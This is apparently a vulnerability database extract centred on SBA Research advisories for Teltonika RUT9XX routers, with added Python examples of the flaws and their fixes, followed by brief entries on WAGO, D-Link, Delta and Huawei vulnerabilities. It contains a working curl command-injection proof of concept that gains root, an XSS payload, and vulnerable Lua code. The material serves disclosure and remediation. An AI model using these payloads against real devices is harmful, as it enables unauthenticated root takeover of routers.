* `2018-04-10` identification of vulnerability in version RUT9XX_R_00.04.161
* `2018-04-16` re-test of version RUT9XX_R_00.04.172
* `2018-04-16` initial vendor contact through public address
* `2018-04-18` vendor response with security contact
* `2018-04-19` disclosed vulnerability to vendor security contact
* `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233
* `2018-07-09` notify vendor about incomplete fix in version RUT9XX_R_00.05.00.5
* `2018-07-19` vendor released fix in version RUT9XX_R_00.05.01.1
* `2018-07-25` re-test of version RUT9XX_R_00.05.01.2
* `2018-09-25` request CVE from MITRE
* `2018-09-26` MITRE assigned CVE-2018-17533
* `2018-10-11` public disclosure

## References ##

* Firmware Changelog: <https://wiki.teltonika.lt/index.php?title=RUT9xx_Firmware>

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
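The attribute-context reflection described in the advisory above, reproduced as an added example that is not part of the SBA advisory or of Teltonika's firmware: the Lua template is re-created in Python so that the unescaped rendering and the attribute-encoded fix can be compared on the advisory's `userurl` proof-of-concept value, and a small parser-based check reports whether a reflected value broke out of its `VALUE="..."` attribute. The hidden-field order follows the Lua template; the form action path, the sample parameter values and the probe marker are assumptions.

```python
"""Added example, not code from the SBA advisory or the Teltonika firmware.
It reproduces the VALUE="..." reflection of hotspotlogin.cgi in Python, puts
the attribute-encoded rendering beside it, and adds a parser-based check that
reports whether a reflected value broke out of its attribute."""
import html
from html.parser import HTMLParser

# Constructed input: the proof-of-concept value for userurl from the advisory.
POC_PAYLOAD = '"><script>alert(1)</script><span'

# Hidden-field order follows the Lua template; the action path is assumed.
_FIELDS = ("challenge", "uamip", "uamport", "userurl", "res")
_ACTION = "/cgi-bin/hotspotlogin.cgi"


def render_form_vulnerable(**params: str) -> str:
    """Mirrors the Lua string concatenation: each value lands inside
    VALUE="..." verbatim, so a double quote in it terminates the attribute."""
    lines = [f'<form name="myForm" method="post" action="{_ACTION}">']
    for name in _FIELDS:
        lines.append(f'<INPUT TYPE="hidden" NAME="{name}" VALUE="{params.get(name, "")}">')
    lines.append("</form>")
    return "\n".join(lines)


def render_form_fixed(**params: str) -> str:
    """Same template with attribute encoding. quote=True encodes the double
    quote as well, so no value can close the attribute or open a new tag."""
    lines = [f'<form name="myForm" method="post" action="{_ACTION}">']
    for name in _FIELDS:
        value = html.escape(params.get(name, ""), quote=True)
        lines.append(f'<INPUT TYPE="hidden" NAME="{name}" VALUE="{value}">')
    lines.append("</form>")
    return "\n".join(lines)


class _FormInspector(HTMLParser):
    """Counts <script> elements and records the decoded value of every hidden
    input, i.e. the structure a browser would build from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            attr = dict(attrs)  # attribute names arrive lower-cased
            if attr.get("type") == "hidden":
                self.hidden[attr.get("name")] = attr.get("value") or ""


def inspect_form(document: str):
    """Returns (number of <script> elements, {hidden field: decoded value})."""
    parser = _FormInspector()
    parser.feed(document)
    parser.close()
    return parser.script_tags, parser.hidden


def reflects_unescaped(document: str, marker: str) -> bool:
    """Check for a captured hotspotlogin.cgi response: True when a marker that
    contains attribute-breaking characters appears in the body verbatim.
    Probe with a harmless marker such as xss"probe rather than a script tag."""
    return any(c in marker for c in '"<>') and marker in document


if __name__ == "__main__":
    params = dict(challenge="abc", uamip="10.0.0.1", uamport="3990",
                  userurl=POC_PAYLOAD, res="failed")
    for label, render in (("vulnerable", render_form_vulnerable),
                          ("fixed", render_form_fixed)):
        body = render(**params)
        print(label, inspect_form(body), reflects_unescaped(body, POC_PAYLOAD))
```

The vulnerable rendering yields one `<script>` element and an empty `userurl` field, because the payload's leading quote closed the attribute; the fixed rendering yields no script element and a `userurl` field whose decoded value is the complete payload, which is the property to verify after patching: data survives, markup does not.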
VAR-201810-0455 CVE-2018-17532 Teltonika RUT9XX router firmware OS command injection vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Teltonika RUT9XX routers with firmware before 00.04.233 are prone to multiple unauthenticated OS command injection vulnerabilities in autologin.cgi and hotspotlogin.cgi due to insufficient user input sanitization. This allows remote attackers to execute arbitrary commands with root privileges. Teltonika RUT9XX routers (whose web interface is based on LuCI) are router products of Teltonika, Lithuania.

* **Identifier** : SBA-ADV-20180319-01
* **Type of Vulnerability** : OS Command Injection
* **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/)
* **Vendor** : [Teltonika](https://teltonika.lt/)
* **Affected Versions** : Firmware RUT9XX_R_00.04.172 and probably prior
* **Fixed in Version** : RUT9XX_R_00.04.233
* **CVE ID** : CVE-2018-17532
* **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSSv3 Base Score** : 9.8 (Critical)

## Vendor Description ##

> RUT955 is a highly reliable and secure LTE router with I/O, GNSS and
> RS232/RS485 for professional applications. Router delivers high
> performance, mission-critical cellular communication and GPS location
> capabilities.

Source: <https://teltonika.lt/product/rut955/>

## Impact ##

An attacker can fully compromise the device by exploiting the vulnerabilities documented in this advisory. Sensitive data stored on or transmitted via the device might get exposed through this attack.

## Solution ##

We recommend upgrading to version RUT9XX_R_00.04.233 or newer, which includes fixes for the vulnerabilities described in this advisory.

## Vulnerability Description ##

The scripts are part of the coova-chilli captive portal. However, the vulnerabilities are exploitable regardless of the device configuration, even if no captive portal is configured.

More concretely, the following parameters are vulnerable:

* `/cgi-bin/autologin.cgi`
  * reply
  * uamport
  * challenge
  * userurl
  * res
  * reason
  * *If* res=success
    * uamip
    * uamport
    * userurl
* `/cgi-bin/hotspotlogin.cgi`
  * *If* send=1
    * uamip
    * TelNum
    * challenge
    * uamport
    * userurl
  * *If* button=1 or (res=wispr and UserName=1)
    * uamport
    * uamip
  * *If* res=success or res=already or res=popup2
    * uamip
    * uamport
  * *If* res=logoff or res=popup3
    * uamip
    * uamport

The affected scripts use these parameters to build OS commands via string concatenation without proper sanitization. The vulnerabilities are located in the source files `hotspotlogin.cgi` and `landing_page_functions.lua`, which is included from `autologin.cgi` and `hotspotlogin.cgi`. For example, it provides the function `getParam`, which directly passes the argument to `io.popen`:

```lua
[...]
function getParam(string)
    local h = io.popen(string)
    local t = h:read()
    h:close()
    return t
end
[...]
```

`landing_page_functions.lua` also provides the functions `debug` and `get_ifname`, which use `os.execute` and `getParam` in an insecure way:

```lua
[...]
function debug(string)
    if debug_enable == 1 then
        os.execute("/usr/bin/logger -t hotspotlogin.cgi \""..string.."\"")
    end
end
[...]
function get_ifname(ip)
    local result = getParam(format("ip addr | grep \"%s\"", ip))
    local tun = string.match(result, "(tun%d+)")
    local ifname = "wlan0"
[...]
```

For example, `hotspotlogin.cgi` makes use of the functions `get_ifname` and `getParam`. Occasionally, it also insecurely uses `os.execute` directly:

```lua
[...]
if send and send ~= "" and tel_num then
    local ifname = get_ifname(uamip)
    local pass = generate_code(ifname) or "0000"
    tel_num = tel_num:gsub("%%2B", "+")
    local exists = getParam("grep \"" ..tel_num.. "\" /etc/chilli/" .. ifname .. "/smsusers")
    local user = string.format("%s", pass)
    local uri = os.getenv("REQUEST_URI")
    local message = string.format("%s Password - %s \n Link - http://%s%s?challenge=%s&uamport=%s&uamip=%s&userurl=%s&UserName=%s&button=1", tel_num, pass, uamip, uri, challenge, uamport, uamip, userurl, pass)
    local smsotp_mesg=string.format("%s;%s", tel_num, pass)
    message = getParam(string.format("/usr/sbin/gsmctl -Ss \"%s\"", message))
    if message == "OK" then
        os.execute("echo \""..smsotp_mesg.."\" >> /tmp/smsotp.log")
        sms = "sent"
        if exists then
            os.execute("sed -i 's/" ..exists.. "/" ..user.. "/g' /etc/chilli/" .. ifname .. "/smsusers")
        else
            os.execute("echo \"" ..user.. "\" >>/etc/chilli/" .. ifname .. "/smsusers")
        end
[...]
```

In one of the first lines of the above code snippet, `hotspotlogin.cgi` calls `get_ifname` with unsanitized user input from the parameter `uamip`. A few lines later it calls `getParam` with unsanitized user input from the parameter `TelNum`. In a further call to `getParam` it uses more unsanitized user input. There are further locations that call insecure functions like `debug` and `get_ifname` either directly or indirectly with user input from the scripts `autologin.cgi` and `hotspotlogin.cgi`.
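The `get_ifname`/`getParam` pattern analysed above, ported to Python as an added example that is not part of the SBA advisory or of Teltonika's firmware. The vulnerable variant splices `uamip` into a shell command line exactly as the Lua `format` call does; the hardened variants first validate the value as an IP address literal and then either build an argument vector that never touches a shell or, where a shell pipeline is unavoidable, quote the value. The `grep -F --` invocation, the constructed `ip addr` output, the `/bin/sh` demo and the harmless `echo INJECTED` marker are assumptions made for the example.

```python
"""Added example, not code from the SBA advisory or the Teltonika firmware.
It ports get_ifname()/getParam() from landing_page_functions.lua: the
vulnerable variant splices uamip into a shell command line, the hardened
variants validate the value as an IP literal and keep it out of the shell."""
import ipaddress
import shlex
import subprocess

# Constructed input: the uamip value from the advisory's proof-of-concept.
POC_PAYLOAD = '"; id >/tmp/test #'

# Constructed 'ip addr' output in the shape get_ifname() greps through.
SAMPLE_IP_ADDR = """\
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 state UNKNOWN
    inet 10.0.0.1/24 brd 10.0.0.255 scope global tun0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP
    inet 192.168.1.1/24 brd 192.168.1.255 scope global wlan0
"""


def grep_command_vulnerable(ip: str) -> str:
    """Equivalent of format('ip addr | grep "%s"', ip) handed to io.popen:
    the request parameter becomes part of the command line unchanged."""
    return f'ip addr | grep "{ip}"'


def validate_ip(ip: str) -> str:
    """Allow-list check: only an IPv4/IPv6 literal passes; a value carrying
    shell metacharacters raises ValueError before any command is built."""
    return str(ipaddress.ip_address(ip))


def grep_argv_fixed(ip: str) -> list:
    """Argument vector for grep without a shell: the validated address is one
    argv element; -F makes it a literal pattern, -- stops option parsing."""
    return ["grep", "-F", "--", validate_ip(ip)]


def grep_command_quoted(ip: str) -> str:
    """When a shell pipeline is unavoidable (io.popen has no argv form), quote
    the value so the shell treats it as a single word. Validate anyway."""
    return f"ip addr | grep -F -- {shlex.quote(validate_ip(ip))}"


def find_tunnel_interface(ip: str, ip_addr_output: str) -> str:
    """Port of get_ifname(): the tunN interface named on the first 'ip addr'
    line mentioning the address, else the wlan0 default. The text is searched
    in Python, so no command is executed at all."""
    ip = validate_ip(ip)
    for line in ip_addr_output.splitlines():
        if ip in line:
            for token in line.split():
                if token.startswith("tun") and token[3:].isdigit():
                    return token
            break
    return "wlan0"


def run_pipeline_demo(ip: str) -> str:
    """Runs the vulnerable pipeline under /bin/sh against the constructed
    sample (passed as $0) instead of the real 'ip addr', so the breakout can
    be observed without touching the system. Requires a POSIX shell."""
    cmd = f'printf "%s" "$0" | grep "{ip}"'
    proc = subprocess.run(["/bin/sh", "-c", cmd, SAMPLE_IP_ADDR],
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    print(grep_command_vulnerable(POC_PAYLOAD))
    print(find_tunnel_interface("10.0.0.1", SAMPLE_IP_ADDR))
    for value in ("10.0.0.1", POC_PAYLOAD):
        try:
            print(grep_argv_fixed(value))
        except ValueError as exc:
            print("rejected:", exc)
    # Harmless marker in place of the advisory's 'id >/tmp/test' payload.
    print(run_pipeline_demo('"; echo INJECTED #'))
```

With the marker payload the demo prints the whole sample (the empty `grep ""` pattern matches every line) followed by `INJECTED`, which is the same shell behaviour that turns the advisory's `uamip` value into a root-privileged `id` on the router; the validated and argv-based paths reject the value before a shell ever sees it.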
## Proof-of-Concept ##

For example, an attacker can exploit this vulnerability by manipulating the `uamip` parameter:

```sh
curl -v -o /dev/null "http://$IP/cgi-bin/hotspotlogin.cgi" -d 'send=1&uamip="; id >/tmp/test #'
```

The device executes the commands with root privileges:

```bash
# cat /tmp/test
uid=0(root) gid=0(root)
```

## Timeline ##

* `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84
* `2018-04-10` detailed analysis of version RUT9XX_R_00.04.161
* `2018-04-16` re-test of version RUT9XX_R_00.04.172
* `2018-04-16` initial vendor contact through public address
* `2018-04-18` vendor response with security contact
* `2018-04-19` disclosed vulnerability to vendor security contact
* `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233
* `2018-07-09` re-test of version RUT9XX_R_00.05.00.5
* `2018-09-25` request CVE from MITRE
* `2018-09-26` MITRE assigned CVE-2018-17532
* `2018-10-11` public disclosure

## References ##

* Firmware Changelog: <https://wiki.teltonika.lt/index.php?title=RUT9xx_Firmware>

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
VAR-201810-1044 CVE-2018-16210 WAGO 750-881 Ethernet Controller Device Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
WAGO 750-88X and WAGO 750-89X Ethernet Controller devices, versions 01.09.18(13) and before, have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi SNMP_DESC or SNMP_LOC_SNMP_CONT field. The WAGO 750-881 Ethernet Controller contains a cross-site scripting vulnerability; information may be obtained and information may be altered. The WAGO 750-881 Ethernet Controller is an Ethernet controller device from WAGO, Germany. A remote attacker can use the SNMP_DESC or SNMP_LOC_SNMP_CONT field to inject arbitrary web script or HTML. The vulnerability stems from the web application's failure to correctly validate client-supplied data. An attacker could exploit this vulnerability to execute client-side code.
VAR-201810-1623 No CVE D-Link DIR601 Credential Disclosure Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The D-Link DIR-601 is a popular 150 Mbps home router. The D-Link DIR-601 has a credential disclosure vulnerability. An attacker can exploit the vulnerability to retrieve sensitive information about the device configuration and management credentials.
VAR-201810-1594 No CVE D-Link DSL-2750B OS Command Injection Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The D-Link DSL-2750B is an ADSL router. There is an OS command injection vulnerability in the D-Link DSL-2750B. An attacker can exploit the vulnerability to execute arbitrary commands.
VAR-201810-1595 No CVE D-Link DSL-2750B OS Command Injection Vulnerability (CNVD-2018-20854) CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The D-Link DSL-2750B is an ADSL router. There is an OS command injection vulnerability in the D-Link DSL-2750B. An attacker can exploit the vulnerability to execute arbitrary commands.
VAR-201810-0465 CVE-2018-17927 Delta Industrial Automation TPEditor TPE File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability CVSS V2: 6.8
CVSS V3: 7.8
Severity: MEDIUM
In Delta Industrial Automation TPEditor, TPEditor Versions 1.90 and prior, multiple out-of-bounds write vulnerabilities may be exploited by processing specially crafted project files lacking user input validation, which may cause the system to write outside the intended buffer area and may allow remote code execution. Delta Industrial Automation TPEditor contains an out-of-bounds write vulnerability; information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation TPEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of TPE files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Delta Industrial Automation TPEditor is Windows-based programming software for Delta text panels from Delta Electronics. Failed exploit attempts will likely result in denial-of-service conditions.
VAR-201810-0466 CVE-2018-17929 Delta Industrial Automation TPEditor TPE File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability CVSS V2: 6.8
CVSS V3: 7.8
Severity: MEDIUM
In Delta Industrial Automation TPEditor, TPEditor Versions 1.90 and prior, multiple stack-based buffer overflow vulnerabilities may be exploited by processing specially crafted project files lacking user input validation before copying data from project files onto the stack, and may allow an attacker to remotely execute arbitrary code. Delta Industrial Automation TPEditor contains a buffer error vulnerability; information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation TPEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Delta Industrial Automation TPEditor is Windows-based programming software for Delta text panels from Delta Electronics. Failed exploit attempts will likely result in denial-of-service conditions.
VAR-201810-1237 CVE-2018-7989 Huawei Mate 10 pro Authentication vulnerabilities in smartphones CVSS V2: 2.1
CVSS V3: 4.6
Severity: MEDIUM
Huawei Mate 10 pro smartphones with versions before BLA-AL00B 8.1.0.326(C00) have an improper authentication vulnerability. App Lock is a function that prevents unauthorized use of apps on the smartphone; an attacker could directly change the lock password after a series of operations. Successful exploitation could allow the attacker to use the locked application. The Huawei Mate 10 Pro is a smartphone product from China's Huawei.